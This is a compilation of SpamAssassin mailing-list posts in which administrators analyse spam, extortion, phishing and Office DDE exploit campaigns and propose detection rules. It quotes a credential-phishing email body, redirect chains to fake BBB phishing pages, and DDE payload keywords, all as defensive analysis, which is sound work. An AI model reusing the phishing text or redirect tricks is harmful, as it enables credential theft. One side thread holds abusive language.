questions on spamassassin

[Rajesh M]

dear friends,

had a few questions

1) what is the sequence based on which the rules are processed ?
is there any documentation on this ?
how is the rule number example 20_dnsbl_tests.cf  or 25_uribl.cf related to the 
sequence of rule processing ?

2) is there a way by which if a specific rule is triggered i can stop all 
further processing.
basically we plan to implement certain rules related to specific body or header 
content which we are sure is spam and do not wish to process any further and 
these will be placed in the local.cf file at the beginning

thanks and regards
rajesh

Re: Spam from Turkey?

[M. Omer GOLGELI]

Hi,

Some networks are known to be more accommodating spam here. 
I wouldn't actually call these "ISPs"
These are usually one-man-show hosting companies with either no care or 
knowledge. 

I don't think it would hurt anyone if you are to block their complete IP ranges.
But going back my logs by a month, it seems I got some too. 

They don't send to generic mail addresses and they seem to be using legit user 
mails. I presume they operate on a mail list.
And they seem to use lots of useless TLDs with different domain names in their 
spams and as they seem to hit

UriRBLs (centuryfear.guru:SURBL,SURBL,URIBL,SPAMHAUSDBL)
or
PreRBLs (TRUNCATEGBUDB,BLOCKLISTDE)

they get denied instantly


Did you try contacting via abuse?




M. Omer GOLGELI
---


August 31, 2020 8:15 AM, "Bill Cole"  
wrote:

> On 30 Aug 2020, at 3:02, Anders Gustafsson wrote:
> 
>> Hi!
>> 
>> Over the last months the real egregious spammers have all been from > 
>> Turkish ISPs. Had 15+ of them
>> during this
>> morning from Meric Internet Teknolojileri A.S. anyone seen this as > well?
> 
> On some systems but not others, so apparently it's somewhat targeted. 
> 45.136.7.0/24 most recently.
> All listed on SBL-CSS.
> 
> -- Bill Cole
> b...@scconsult.com or billc...@apache.org
> (AKA @grumpybozo and many *@billmail.scconsult.com addresses)
> Not For Hire (currently)

Re: ANNOUNCEMENT: The NEW invaluement "Service Provider DNSBLs" - 1st one for Sendgrid-spams!

[M. Omer GOLGELI]

Sendgrid and their likes...

Checking 1 days logs for 1 domain, I see that of the 17 SendGrid mails to hit 
my antispam gateway, 17 of them were spam from 9 distinct senders.

I can't deal with hunting spammers like that, giving a nice little score the 
spam tools that allow this kind of mass mailing without checks is the better 
approach IMO. 





M. Omer GOLGELI


August 22, 2020 10:17 AM, "Benny Pedersen"  wrote:

> @lbutlr skrev den 2020-08-22 08:03:
> 
>> On 21 Aug 2020, at 14:15, Benny Pedersen  wrote:
>>> blacklist_from *+14927644-*
>> 
>> I think adding 5.0 to all sendgrid mail is the best idea I've heard.
>> Sendgrid makes me long for the days of the SPEWS RBL.
> 
> i am soon to be tired of it to add it to rpz in bind9

Re: Why the new changes need to be "depricated" forever

[M. Omer GOLGELI]

July 22, 2020 11:46 AM, "M. Omer GOLGELI"  wrote:


> Like Laura questioned, 

Oops!
/Laura/Loren/ my bad...




--
M. Omer GOLGELI

Re: Why the new changes need to be "depricated" forever

[M. Omer GOLGELI]

July 22, 2020 11:16 AM, "Charles Sprickman"  wrote:

>
> you’d like the
> whole world to adjust to your narrow views (which all center around your 
> experiences of the world,
> which of course are the only valid ones, right?). So yes, you’re a bunch of 
> snowflakes.
> 

This is a perfect explanation for this whole thing. People of US, with their 
extremely racists backgrounds, thinking it's racist or not while being limited 
to their experiences of the world... 

Like Laura questioned, nobody in non-english speaking countries care about that 
as much as you guys since when most look at the word Black, all they see is the 
color Black...



July 22, 2020 11:16 AM, "Charles Sprickman"  wrote:

> You could have just packed up and left, used other software that didn’t 
> offend your gentle
> sensitivities, forked SA, or (IMO, the best option) just shut the f*ck up, 


July 22, 2020 10:39 AM, "Noel Butler"  wrote:
> if you dont like democracy at work (ppl having their say) , then you fuck off



Both of you are acting like children. Well done.
​​​Nice language BTW.


--
M. Omer GOLGELI

Re: spamhaus enabled by default

[M. Omer GOLGELI]

Congrats on derailing another post needlessly.





M. Omer GOLGELI



July 15, 2020 12:41 AM, "Antony Stone" 
 wrote:

> On Tuesday 14 July 2020 at 23:23:29, Martin Gregorie wrote:
> 
>> On Tue, 2020-07-14 at 22:59 +0200, Antony Stone wrote:
>> On Tuesday 14 July 2020 at 21:46:11, Martin Gregorie wrote:
>>> This info should include lots of black (hashmarks, asterisks etc).
>> 
>> You should be careful of the language you use these days, especially
>> on this list.
>> 
>> Yes, I am being sarcastic about what you wrote, but I'm also being
>> serious about the apparent power of the language police.
>> 
>> I don't underestimate the power of the thought police (McCarthy was the
>> standout example of *THAT*) or their, sometimes wilful, ignorance. You
>> know what I meant, but if I'd written something like "include big blocks
>> of attention-getting high-density characters", might that be interpreted
>> as an attack on the comprehensionally challenged?
> 
> 1. Yes, and those sectors of society defending the mentally deficient might be
> somewhere back in the queue waiting their turn to have a bit of a go at us for
> talking like this
> 
> 2. My comment was not aimed at you in any way at all - it was an observation
> to other people on this list about a different discussion thread which you may
> have noticed in recent days (which, ironically enough, does include big blocks
> of attention-getting high-density characters in its subject line).
> 
> Antony.
> 
> --
> https://tools.ietf.org/html/rfc6890 - providing 16 million IPv4 addresses for
> talking to yourself.
> 
> Please reply to the list;
> please *don't* CC me.

Re: spamhaus enabled by default

[M. Omer GOLGELI]

July 14, 2020 6:07 PM, "Kevin A. McGrail"  wrote:

> The question you ask is exactly why we have the DNSBL Inclusion policy and 
> require the free for
> some model.
> 
> We might need to kick up the need for the BLOCKED rule with instructions in 
> that description on how
> to disable the rules. What are your thoughts on that?
> 

Don't get me wrong, I use them in the scoring process as well and I'm glad to 
use them along with a few others as I'm not that hard bent on keeping 
everything free.

And if I hit the limits somehow, I'll either pay for them or turn them off.

But there will always be people that doesn't want it.
Or those who wouldn't want to see their OSS software relies on commercial 
products.
Or there will be those who does this non-commercially. 
Or there will be people who installed it as part of their OSS mail product and 
doesn't know that there's such a limit etc.

So for that matter, maybe these can be left for the admins decision to enable 
them after installation.
Or all users should be made aware of these limitations in a better manner and 
clearly for each semi-commercial RBL used.








M. Omer GOLGELI

Re: spamhaus enabled by default

[M. Omer GOLGELI]

July 11, 2020 1:33 PM, "Riccardo Alfieri"  wrote:

> Excuse me but isn't it at least "fair" that, if you use a service provided by 
> others for commercial
> purposes, you pay for that service that contributes to your income?

It is fair.

Unless you have been unknowingly using it and weren't aware of the limits.

But maybe this kind of RBLs shouldn't be on by default due to their commercial 
nature and must be left to the user to activate after installation.





M. Omer GOLGELI

Re: Technically not spam

[M. Omer GOLGELI]

Personally, 


I mark and categorize them as SPAM, IF they do not have 1-2 clicks 
unsubscribing. Then they are spam. 
99% of the times these are senders who opt you in automatically to few lists 
without double opt-in whilst never giving you a choice of what to ask for, or 
even when they do, they do not abide by it. If they are not decent enough to at 
least let you get off their spam list with a 1-2 clicks, I'm gonna mark write 
rules against them, teach spamassassin and for some persistent ones, I'll even 
report them.

(Most of Google Groups, Twitter and Facebook emails go to the same category 
coincidentally because even if the mail addresses do not exist, you can not get 
out of the list and can't report address as fake)




--
M. Omer GOLGELI


May 29, 2020 6:40 PM, "@lbutlr"  wrote:

> How do people deal with lists that a user subscribed to that require logging 
> in to an account to
> unsubscribe? I seem to be seeing a lot more complaints from users who cannot 
> get off lists
> (probably because they didn't realize they were creating an account for 
> getting multiple-mails per
> day).
> 
> Most legitimate mails have a simple unsubscribes list, but many online stores 
> seem to "forget" to
> do this.
> 
> I can't just blacklist the IPs because some people want these emails.
> 
> -- 
> Stomach in! Chest out! on your marks! get set! GO! Now, now that
> you're free, what are you gonna be? Who are you gonna see? And
> where, where will you go, and how will you know you didn't get it
> all wrong?

Re: Question on early detection for relay spam

[M. Omer GOLGELI]

If password rotating is out of the question, you might want to check your IPs 
against blacklists multiple times at a day, it wouldn't stop it but it may 
notify you earlier to stop an outbreak.

Other thing that comes to mind is, you may try rate limiting your users and 
setup a cron to monitor the number of outgoing messages and notify you if 
there's a sudden surge of mail requests.





M. Omer GOLGELI
---
AS202365

  https://as202365.peeringdb.com 
  https://bgp.he.net/AS202365 

NOC:
 Phone: +90-533-2600533
 Email:  o...@chronos.com.tr


March 3, 2020 10:26 AM, "Ted Mittelstaedt"  wrote:

> I know this is probably off topic but I'm getting desperate enough to ask.
> 
> I run a commercial mailserver that regularly seems to have spammers relay 
> mail through it that have
> obtained stolen credentials for a user. Many years ago I stopped allowing 
> users to change passwords
> on it and I setup passwords for all users added to it, and the passwords are 
> random strings of 8
> characters or more.
> 
> The problem is of course that since the passwords are difficult to remember, 
> once the users do
> remember them they merrily proceed to use
> this "highly secure password that I can now remember" on every stupid
> website out on the Internet that they care to login to. The problem
> isn't really the people using Thunderbird or Outlook or their cell phones or 
> whatever, because they
> save the password in the email client and then immediately forget it, which 
> is what I want. It is
> the people who use the webmail interface on multiple different systems, kiosk
> computers and the like, who are the problem. When hosts out on the
> Internet get busted into, the spammers get their passwords and
> email addresses and start relaying. I've confirmed this with several
> users I've called and it's always the same story.
> 
> By the time I see what's going on the server is blacklisted everywhere
> and I have to waste time delisting it, and asskissing all of the
> little tiny blacklists run by little pricks who want me to pay money
> or wait a month to be delisted, etc. (no I'm NOT talking about
> spamcop, or barracuda or anyone professional - THEY know what they are
> doing and don't look at this as a chance for a shakedown)
> 
> I estimate that last year this happened around 5 times and I just
> lost an afternoon today answering the passle of help requests from
> users because it happened again.
> 
> What I am wondering is how to tighten up my monitoring on my servers to
> more rapidly identify when this starts happening. What I'm doing now is
> a kludge but I run mailq (this is a sendmail system) and when I see the
> number of pending mail mesages in there exceed a threshold I send an alert to 
> my cell. It is a
> kludge and the problem is that
> the mailq doesn't start filling up until my server gets blacklisted.
> 
> I've considered several ideas like running a script out of cron that
> checks the number of authid's per hour but all of these seem like even
> worse kludges. The only idea that I have come up with that I really
> like is taking an AK-47 to the spammers but unfortunately spammers
> know that they are unloved and cowardly hide away in Russia and scummier
> places and I can't reach 'em. (maybe I could offer a bounty? A nickle a head? 
> That would pay for
> the bullet at least. I don't think those people are worth even that, though)
> 
> I do run a daily sendmail statistics report but by the time I read that
> and see the bump in traffic it's too late.
> 
> What do other people do for this problem?
> 
> Ted

RE: New bitcoin ransom message today

[Chip M.]

On Wed, 18 Dec 2019, John Hardin wrote:
>Can you post a spample

This is a very interesting pattern that I've seen in a few (9) spams
this week.
Here's a spample (with only the To header MUNGED):
http://puffin.net/software/spam/samples/0062_snow_style_chaff_aws.txt
Lindsay, is that what you're seeing?

All 9 have scored above SA's default threshold, however most just
barely. The biggest scoring hit was "TO_NO_BRKTS_DYNIP".
None hit any GIBBERISH test, though that could be an issue with the
webhost (it's a shared "plain vanilla" SA install, not a custom
tuned one).

What I found interesting was both the style chaff and the use of 
"storage.googleapis" to hide the payload.
Google appears to have disabled the one in this spample.
The one I looked at yesterday had a "Meta refresh" to an 
intermediate URL, which had a javascript redirect
(via "window.location.href") to the final target.
Both domains were relatively recently registered and both are _NOT_
on any major domain blocklist.

Another interesting "tell" is its sloppy/ridiculous SPF:
v=spf1 ip4:52.0.0.0/8 ip4:3.0.0.0/8 ip4:54.0.0.0/8 ip4:107.0.0.0/8 
ip4:18.0.0.0/8 ip4:34.0.0.0/8 -all
Perhaps they're anticipating Amazon gobbling up more IP space?!?


Since the OP asked about non-SA approaches...
All hit my own filter's style size ratio test, with a
range of 98.3% to 99.1%.
I'm not a Perl programmer, so do not know if that is a practical
test to implement in SA.
It amazes me how much ham scores high on that!
I did a quick check of the last month for a highly diverse domain
and of emails with at least 90% "style", 16.7% were spam (all snow)
and 7% were ham (all ESP).
Next week I'll be datamining, so will look at that in more detail.


I've been scoring "storage.googleapis", however it's used by a lot
of non-security-competent Hammers, so it's difficult to give it more
than a small score.
IMO it would be worthwhile to score it at least a wee bit in case
that would help anybody convince their PHB that it's a Bad Practice.

John, perhaps a meta for style issues, AWS, and googleapis?
- "Chip"

RE: New bitcoin ransom message today

[Chip M.]

As requested:
http://puffin.net/software/spam/samples/0061_bitcoin_splosion.txt
I MUNGED the "To".
It's the latest of two sent to me by an awesome volunteer. :)

First thoughts:
Both were base64 encoded.
Both have "disclaimers" that they're not terrorists. :roll-eyes:

John Hardin: I'll ask for a full bundle from this volunteer (he's in your time 
zone), and send you full spamples of everything relevant.
- "Chip"

Re: 9D character used in words to avoid detection

[Chip M.]

Ditto to what John said, however, thanks for the spample Mark. :)

Mark, is that the exact network image?
If not, do you have access to it? If so, please pastebin it.
By "network image", I mean not-mangled by any post filter software.

Your posted spample is quoted-printable, and should have been decoded 
then hit some bitcoin/sextortion specific rules.
In your spample, the Content headers are borked, and it wasn't 
recognized as qp, hence the abundant "9D" artifacts.


I ran it as-is, and it scored poorly.
After I manually de-borked the headers, and retested, it hit SA's 
"OBFU_BITCOIN" and my own anti-bitcoin/sextortion & hi-Ascii-count tests.


The question is, is that broken header pattern in the original, and 
if so, should it be detected & scored, in-and-of-itself?

We'd need the most pristine original, before proceding. :)
- "Chip"

P.S. Sorry for the lack of Reply headers.  I'm on the road, with limited tools.

spample: porn extortion with pure numeric From domain and base64 body

[Chip M.]

There's a new morph of the porn extortion campaign, with some
interesting under-the-hood changes.

The previous ones were always:
- two "quoted-printable" parts (plain text, html)
- "From" Outlook accounts
- sent via Outlook/Hotmail/MS IPs (no other IPs in route)
- passed both DKIM and SPF

The new version has:
- one base64 html part
- pure numeric "From" domain (same address in SMTP & header)
- sent via compromised computers (and typically 3 or 4 Received IPs)
- bogus domains so neither DKIM nor SPF possible
- 8 of 13 samples had a Reply-To, with the same address as the From,
  and the RealNames were different

Unchanged:
- html part has hundreds of comments containing just the To account
- pretty much the same message
  (new versions have some potentially useful HTML/comment chaff)
- _ALL_ have snuck thru plain vanilla SA :(
  (old Outlooks ones were consistently less than 1.0;
   new: 92% in 2s, 8% in very low 4s)

Currently, all IPs except one (the oldest) are on the CBL.

Full raw spample:

http://puffin.net/software/spam/samples/0058_extortion_numeric_domain.txt
I MUNGED the "To" and the Body.
Since I munged the account name to "target", I had to re encode the
Body.
** John Hardin & KAM:  if you'd like some unmunged spamples, I'd be
happy to send a zip. :)

Here's the SA test stats for 13 of this new morph:
  FORGED_MUA_MOZILLA  1
  HTML_MESSAGE   13
  HTML_MIME_NO_HTML_TAG  13
  LOCALPART_IN_SUBJECT   13
  MIME_BASE64_TEXT9
  MIME_HTML_ONLY 13
  RCVD_IN_SORBS_DUL   1
  RDNS_DYNAMIC3
  TVD_RCVD_SPACE_BRACKET  6
  UNPARSEABLE_RELAY   6

This new variant should be easy to exterminate. :)

1. The quick and easy combo of "HTML_MIME_NO_HTML_TAG" and
   "LOCALPART_IN_SUBJECT" is worth a meta.
   The latter test is _VERY_ rare in Ham.
2. Another meta with those two and "MIME_BASE64_TEXT" is even safer.
3. Pure numeric TLDs appear to be non existent (so far!), so I look
   forward to you regex wizards doing your thing. :)
4. There's lots of low risk phrases worth scoring (KAM rules?).
5. Riskier & more complex:  The pattern of the account name occurring
   hundreds of times in HTML comments is distinctive, and "feels"
   safe, however Thick Hammers are unpredictable.
   I will be releasing a regression test for my volunteers.
   Once I get sufficient Ham stats, I'll report back.


Three other unusual things (all demonstrated in this spample):

1. 9 of the 13 had a two part pure numeric claimed host (see below).
I don't recall seeing that before.
** Is that a botnet fingerprint?

2. 9 of the 13 lacked a trailing "=".
I don't recall seeing that before.
It's probably worth a quick test, if easy to implement.
There was no correlation with the numeric host pattern.

3. 4 of the 13 failed to hit "MIME_BASE64_TEXT".
I'm curious what the issue is.
The trailing "=" was not a factor.
The main thing that stood out is that the hits all had this CT:
Content-Type: text/html;
charset="us-ascii"
The misses all had:
Content-Type: text/html;
charset="iso-8859-1"


Here are the IPs, and the claimed hostnames in square brackets:
1.52.117.145[738.521]
5.76.183.251[926.664]
14.231.121.148  [253.975]
41.212.106.159  [41.212.106.159.wananchi.com]
42.113.254.123  [303.494]
49.205.51.26[broadband.actcorp.in]
94.233.89.142   [dsl-94-233-89-142.avtlg.ru]
103.86.161.66   [439.461]
109.60.246.66   [842.384]
180.252.178.204 [742.584]
196.190.63.7[982.491]
197.248.154.10  [197-248-154-10.safaricombusiness.co.ke]
202.138.244.76  [344.393]

Here are the actual (unmunged) From headers:
"Sofia Kirby" <066@842.384>
"Eugenia Koch" <340@145.390>
"Trisha Savage" <907@344.393>
"Debra Arnold" <367@439.461>
"Christine Waller" <294@982.491>
"Lawrence Bender" <516@303.494>
"Rey Wooten" <381@738.521>
"Elvira Nguyen" <977@557.566>
"Mai Mullins" <556@742.584>
"Darrick Hendricks" <540@926.664>
"Pablo Hess" <692@442.947>
"Elba Olsen" <255@434.964>
"Millie Weber" <041@253.975>


We're killing 100% of these (post plain-vanilla SA), mainly due to
IP Nation tests, lots of custom body phrase tests, and some body
"stupid tricks" tests.

I've just added the above suggested SA metas, and a 
low level (non-regex) pure numeric TLD test.

I expect more morphs.
- "Chip"

P.S.  It occurred to me that the complete lack of Sender Verification
in these could benefit spammers. There's zero DKIM processing
overhead, so these should be processed a wee bit faster by
non-graylisting receivers. That could make the difference in whether
it hits a post-gateway blocklist.
** Does anyone have performance stats on how long DKIM processing
takes?
That might explain the drop in DKIM usage by snowshoers.

SPF PermError (was: "Re: Scans and Invoice spam containg HREF to something bad")

[Chip M.]

On Tue, Jun 19, 2018 at 11:00 AM, Andy Smith  wrote: 
> Testing despite these errors the only rule I'm getting a hit on from KAM 
> is JMQ_SPF_NEUTRAL_ALL 

Andy, thanks for the very useful spamples! :)

Could somebody do a sanity check on the SPF record for 
"ballybofeycarpets.com"?
I get a PermError, not SPF_NEUTRAL.
I checked using 2 different DNS servers.

Is that a bug, or an intentionally incomplete implementation?
If one skips the "a mx ptr" mechanisms, it would return Neutral.

In the first version of my own SPF code, I chose just to implement
the "ip4" and "include" mechanisms, on the theory that nobody in
their right mind would use the above three... and, of course, was
subsequently surprised at the high rate of non-right-mindedness. ;)
(I blame the abundant poor examples cut-and-pasted by cheap/bulk
webhosting companies.)


Occasionally, I see PermError with Really Big companies.
Typically, they do have a DMARC record, so should be receiving
reports, however I rarely see the problem(s) fixed.
If some SPF implementations are not returning PermError, that would
explain some of those.

*** Is there some generally accepted way to contact those companies?
Maybe their Postmaster?
Probably a lost cause, but it's frustrating seeing Broke Stuff. :(
- "Chip"

Re: spample: Microsoft Office DDE exploit (in OpenXML attachment)

[Chip M.]

On Tue, Oct 31, 2017, David Jones  wrote: 
>Add the Lashback RBL.  I am trying to get this added to the default SA 
>rules.  See my post on 2017-10-17 in the following link and increase the 
>scores after some testing.

David, after your Lashback post, I had added it to my FP pipeline
(i.e. run from the desktop, NOT real-time) for evaluation, however
I had made a minor setup mistake.
Thanks for the reminder that prompted me to check and fix that. :)
If that proves useful, I'll add it to my post-gateway real-time
stack.

Thanks for your other suggestions. :)


Benny:
Thanks for the clamav submission page, however it did not work with
my browser (after NIMDA, I turned "off" all the whizbang security 
nightmare stuff). :(
You or anyone else is welcome to submit it there or anywhere. :)

"Rupert":
That was one of 30 that passed gateway RBL testing and
(plain vanilla) ClamAV.
It was _NOT_ "addressed to someone-else".
If you do a bit of DNS analysis on the Received headers, it will be
clearer.
You are correct that it failed SPF. :)
I checked all the others, and they too failed, which is somewhat
unusual.


*** All:
*** Clarification: 100% of these are being caught by my filters.
I posted to share a live sample, since there's lots of technical
analysis articles but I have not yet seen complete samples of all
the file vectors that are possible.

I'm mainly interested in insights into CONTENT based rules,
and more diverse samples. :)

For example, after the first wave of news, I added a word match rule
for "DDEAUTO", which has _NOT_ yet triggered.  That does trigger if
I change it to a gappy-word rule, after de-tagging these XML pairs:
DDE
AUTO
I had not expected that.

I particularly want to see an .ics sample.
Has anybody else seen much/any DDE attack variants?
- "Chip"

spample: Microsoft Office DDE exploit (in OpenXML attachment)

[Chip M.]

Starting Monday late pm (Iowa time), I've been seeing my first DDE
exploits, with significant volume.
Here's a spample, with only the account part of the To header munged:
http://puffin.net/software/spam/samples/0056_dde_auto.txt

The MIME part Content Types are all of the same form, with only the 
nine (9) digit long invoice number being different (same as used in
the Subject).  The date part is changing correctly.
So far, there's enough consistency there that it may be worth some
quick rules.

Here's a few of the Message-IDs:


















In all cases, the domain matches the domain in the From header.

So far, the From has always been in the form:
Invoicing 

The only SA rules that they're all hitting are:
TVD_SPACE_RATIO
TVD_SPACE_RATIO_MINFP

Internally, these were _NOT_ as I was expecting.
When the buzz about DDE first broke, I was expecting old style doc,
rtf, and ics (calendar) files, and restricted my rules to those.
Today's wave are all OpenXML, and the payload is in file
"word/document.xml".

If you take a close look at just the contents of ""
tag pairs, it appears they can easily obfuscate the payload. :(

I need to do a _LOT_ more reading, but for now, I've added 
seat-of-my-pants rules for exact word matches on:
DDE
instrText
AUTO
gfxdata

So far, using an older (v3.4.1) plain vanilla SA setup, my 
killrate with Bayes is 48% (without Bayes, it would have been 
about 30.4%).

My post SA filter has been killing them all, but that's due to my
aggressive rules and a bit of luck.
I've asked one of my people with less aggressive rules and more 
diverse ham to run some ham-only MassChecks using the above rules.
I'll share the results.

Has anyone seen the RTF or Calendar/.ics forms of this exploit?
If so, please-please-please post a spample.
- "Chip"

phising spam

[Rajesh M]

hello

how do we mark such email as spam where our customer is sent an email asking 
user to verify account to prevent the account being disabled.

i have provided below the source of such emails.

#
Hi metal@mycustomer.net.in ,

Recently we received some notifications regarding your
account:metal@mycustomer.net.in , which might be due to recent changes made
in your email or irregular login attempts on your account.

We will ensure that we block your account if we do not hear from you. Please
kindly click the link below to stop this attempts and reclaim your account.

 Continue 
verification

Thanks,
The Email Team
This email has been sent from an unmonitored email address. Please do not
reply to this message. We are unable to respond to replies.

2017 Email Administrator Inc. All Rights Reserved. |
 Privacy policy
#

thanks
rajesh

Re: new campaign: bitly & appengine.google

[Chip M.]

KAM, thanks!
I took a look at your rules, and like your scoring. :)
Over my years, I've seen enough BBB scare campaigns which use
shorteners, that perhaps it would make sense to add "KAM_SHORT"
to your additive list of metas (I forget what that's called).

To all the other repliers:
Thanks for your input.
All my BitLy spam complaints have been thru SpamCop, and (together
with my data) have left me with a poor impression of BitLy's abuse
handling.

For example, between 2017-Jul-11 and Aug-22, at one of my key
domains, 4.0% of the spam (all Snowshoe) contained the same 
shortener:
bit.ly/2sLdd2P
The SA killrate (generic install only) was 53.02% for those.
During that period, the Location domain ("programmingkeeda") was
almost always on URIBL's blocklist (mostly "black" sometimes
"red"), though not on SpamHaus or Surbl.

I reported at least four (4) samples via SpamCop between Jul-17
and Jul-20, usually with an explicit note/comment to BitLy.

As of this morning, that shortener is still active. :(

Next time I'll try a direct submission, based on the credibility
of some of you who state you've had good experiences. :)

If anybody does have a direct contact with somebody at BitLy that
they trust, I would still appreciate that (off-list).
7 years ago, I posted some rambling ideas about cooperative data
sharing with shortener providers:

http://mail-archives.apache.org/mod_mbox/spamassassin-users/201002.mbox/%3c20100224.0...@iowahoneypot.com%3e
About 4 years ago, I implemented HTTP HEAD and adding Location
URLs to my regular processing, and have been generally pleased
with its performance & efficacy. :)
I did include (and am using) the ability to include the SA score
in the Agent, and would like to have contact with any legit 
shortener providers who would use that (and other data).

My suggestion about using UDP was purely to improve performance
for the gateway filter, when used with an automatic smart 
quarantine approach, where the final decision would be made 
minutes later by a separate app.
For example, Splunk logging is often done via UDP, since it's 
typically viewed by humans, and a few second (or often minutes)
delay is not a big issue, and the potential for lost data packets
is less relevant than performance.
- "Chip"

new campaign: bitly & appengine.google

[Chip M.]

There's a new campaign that uses Bitly shorteners to some sort of
Google forwarder ("appengine").

Here's some sample Locations returned by HEADing the shorteners:

appengine.google.com/_ah/logout?continue=https://appengine.google.com/_ah/logout?continue=http://bbbcomplianceglobal.com/report.php?mn=##

appengine.google.com/_ah/logout?continue=https://appengine.google.com/_ah/logout?continue=http://bbbtax.com/getreport.php?ne=

appengine.google.com/_ah/logout?continue=http://bbbwork.com/abuse.php?number=#

appengine.google.com/_ah/logout?continue=https://appengine.google.com/_ah/logout?continue=http://bbbcompliancenetwork.com/compliance.php?ne=##

appengine.google.com/_ah/logout?continue=https://appengine.google.com/_ah/logout?continue=http://bbb-compliance.com/abuse.php?rt=###
I've hashed out the parts that look like tracking IDs, all of 
which have been pure numeric chars.

Here's the corresponding Subjects:
752566913589:407
8260420930:36
Incident:062881374904:149
Incident:22677610925:290
Incident:5858851682625:543

The message text is a fake BBB complaint.
I'll put a sample online tonight, if practical.

The SA scores have ranged from -2.2 to 1.5, with no useful 
patterns.

Does anyone have a contact at BitLy?  These would be trivially 
easy for them to block.
- "Chip"

block phishing spam

[Rajesh M]

hi

we are constantly getting spam which has the following in the body of the email

dear u...@domain.com

where u...@domain.com is the mailto email id ie our customer's email id

is there a way to mark emails containing the mailto email id in the body of the 
email as spam ?

normal email communications never has such a scenario.

rajesh

Re: Anyone else just blocking the ".top" TLD?

[Chip M.]

Just spotted my first snow with the TLD ".jetzt".
It's selling for $1.88 at NameCheap so should become widespread.

On Sat, 05 Nov 2016, at 11:54, @lbutlr (kreme.com) wrote:
>We get some (very little) real mail from info, biz, and name domains.
>All the other new domains are on a "prove you're not terrible"
>status. So far the only one to graduated is .name.

Yes, that's pretty much my approach. :)

Note that the ratio of ham to spam for ".email" has risen 
significantly, with several legit Muggle organizations 
(e.g. acronis, movietickets) buying and using that TLD of their
base name.
Even otherwise-Giga-Geeky "stackoverflow" has joined that trend.

I'm still killing that TLD by default, but have significantly
dropped its score in my FP pipeline.
- "Chip"

Re: Today's Google Docs phish

[Chip M.]

Alex, thanks for the spample!

I've only received one (so far), containing the same base domain
with the ".win" TLD, also freshly registered at NameCheap with
privacy protection and CloudFlare.


On Thu, 04 May 2017, Axb wrote:
>SA's redirect patterns detected these domains and my logs show 
>most were listed by the domain lists within a few minutes.

URIBL caught mine, in real-time. :)
Good job, ninjas!

I did a very quick (three months, one diverse domain) check on
UNPARSEABLE_RELAY hits, and it had an 18:1 ham to spam ratio. :(
Fortunately, ALL the ham was from Facebook/Instagram, so that 
rule has potential for tweakage.

John, how about a rule against the redirection parameter itself
(i.e. "redirect_uri")?  I suspect it'll hit too much ham, however
it would make a great meta combined with obscure/cheap TLDs,
and/or other characteristics.

I've added that to my own MassCheck queue, and will report back.
- "Chip"

spample: banking credential phish using linked image (with no text)

[Chip M.]

SpamAssassin caught this phish, however some tweaks would have
let it thru, and it's an interesting new (to me) approach, so I
figured I'd share it with y'all.

Full raw spample (with MUNGED email addresses): 
http://puffin.net/software/spam/samples/0053_phish_image.txt
At arrival time, the domain "alshimisiani" was only on 
URIBL Black (the webhost's SA does not run URIBL, so that was
caught by my post-SA filter).

The HTML link had all manner of weirdness (in particular, that
Google "data-saferedirecturl" thingie), so I did a raw HTTP GET
of the image, semi-thinking it was going to be borked or lame.
Instead, I saw this very nicely done, VERY convincing image:
http://puffin.net/software/spam/samples/0053_phish_image.png
I've never noticed that style before.  I've seen similar with
attached image(s), however I rarely pull down remote images.

For a while, I've been concerned that spammers would move to
more remote images in phish, and have been thinking about
adding arrival-time pull-down & analysis of them.

** Has anyone noticed this tactic, and, if so, has it been
going on for a while?


Also of interest is the main URL.
It looks like the site is legit and was cracked/hijacked.
The page used javascript and a meta refresh to redirect to a
different apparently-cracked site, with an interesting 3 hops
within that site, before the final pure javascript payload.

I don't have the time to analyze the js, however it is somewhat
unusual/different from what I've seen in the past.
If it's down by the time anyone legit checks it, feel free to
email me off-list for a copy (LEGIT geeks only and note that I'll
be mostly offline for the next 4-7 days).


I _VERY_ briefly researched the token "data-saferedirecturl", and
my first impression is that maybe it shouldn't occur in email, so
it may be a good test.
** What do the HTML gurus think?

Perhaps it would be worthwhile to MassCheck a meta of
"BODY_URI_ONLY" with highly phish-y From.RealNames?

I just checked the last 3 months of my best corpora, and ham
hits on "BODY_URI_ONLY" were in three categories (highest to 
lowest volume):
- DMARC reports
- ESP/bulk (with SA scores between -4.0 and 5.3)
- person-to-person with an image attachment
I'm already selectively "skip" listing all three scenarios, in
particular DMARC reports (i.e. I never "white" list, I have my
rules segmented into groups that can be easily skipped).
- "Chip"

Re: spample of not(?)-yet-registered "custom" URL Shortener in Phish

[Chip M.]

On Sun, 25 Sep 2016, RW wrote:
>If you mean you poison-pill anything with a redirect, then this
>doesn't seem all that clever because tinyurl is such a well known
>shortener.

I poison pill by default, not always. :)

If the arrival time HEAD is a redirect to a "skip" listed domain,
the poison pill is skipped (which is why I do the HEAD).

My quarantine is a smart/active quarantine, not a dumb/static one
so it's very rare for a legit ham shortener not to be released
semi or fully automatically.
Yes, there's a delay, however it's my view/opinion that anyone
who uses a shortener is self labelling the email as low priority.

My stats show that tinyurl is the most consistently abused of the
well known shorteners, so its poison pill score is higher than
some.  The other popular shorteners tend to have bursts of abuse.
It's less-dumb of the spammers to try this technique at tinyurl
first, then try it at BitLy/etc.

** I forgot to mention that while investigating this, I re-HEAD'd
all 2016 spam shorteners for my most diverse domain, and 87%
still redirect (i.e. 301 or 302 with a Location).  I briefly
skimmed the results, excluding any that did not look spammy
(most looked like snow or WP cracks).

That surprised even cynical me. :\
I'll be running a more thorough test, with more domains, soon.


>> * Does anyone have any idea of the significance of the "X-tiny"
> header in the Windows vs Linux output?  It's probably trivial.
>
>It seems to be a diagnostic header that's only added where the URL
>exits.

Thanks!  That makes sense. :)
- "Chip"

spample of not(?)-yet-registered "custom" URL Shortener in Phish

[Chip M.]

Here's a spample of a well done "Dropbox" Phish sent thru Gmail,
containing a custom URL shortener which (apparently) did _NOT_
exist at message arrival time:
http://puffin.net/software/spam/samples/0045_shortener_phish.txt
I MUNGED the To & From headers, however I left the original From
domain in the DKIM header.

My post SA filter does HEAD lookups of URL shorteners, with
logging of the full headers.
URL shorteners are (currently) low enough volume that I check any
"interesting" ones, in particular, phish.

Here's the server log entry:

[ HEAD "http://tinyurl.com/easystorage42; ]
HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2016 17:29:04 GMT
Content-Type: text/html
Connection: keep-alive
Set-Cookie: __cfduid=dc570dff5ac6a2bc68a5d2e9ff02f5f8b1474306144; expires=Tue, 
19-Sep-17 17:29:04 GMT; path=/; domain=.tinyurl.com; HttpOnly
